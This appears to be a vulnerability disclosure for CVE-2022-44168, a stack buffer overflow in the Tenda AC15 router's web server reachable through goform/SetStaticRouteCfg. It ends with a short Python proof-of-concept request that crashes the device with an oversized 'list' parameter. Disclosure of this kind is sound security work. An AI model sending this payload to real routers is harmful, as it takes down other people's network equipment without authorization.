CVE-2022-44168: IoT_vuln/Tenda/AC15/fromSetRouteStatic at main · RobinWang825/IoT_vuln

Tenda AC15(V15.03.05.18) has a Buffer Overflow Vulnerability****Product

1. product information: https://www.tenda.com.cn/
2. firmware download:https://www.tenda.com.cn/download/detail-2710.html

Affected version

V15.03.05.18

Vulnerability

The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the fromSetRouteStatic function, which can be accessed through the URL goform/SetStaticRouteCfg.

In function fromSetRouteStatic, the content obtained by the program from the parameter list is passed to v5, and then the v5 is passed into the sub_78530 function as the second argument.

In sub_78530 function, the function sscanf is called to split it and copy to stack buffer without checking its length.

PoC

Poc of Denial of Service(DoS)

import requests data = { b"list": b’A’*0x400+b’,A,A,A’ } res = requests.post("http://192.168.0.1/goform/SetStaticRouteCfg", data=data) print(res.content)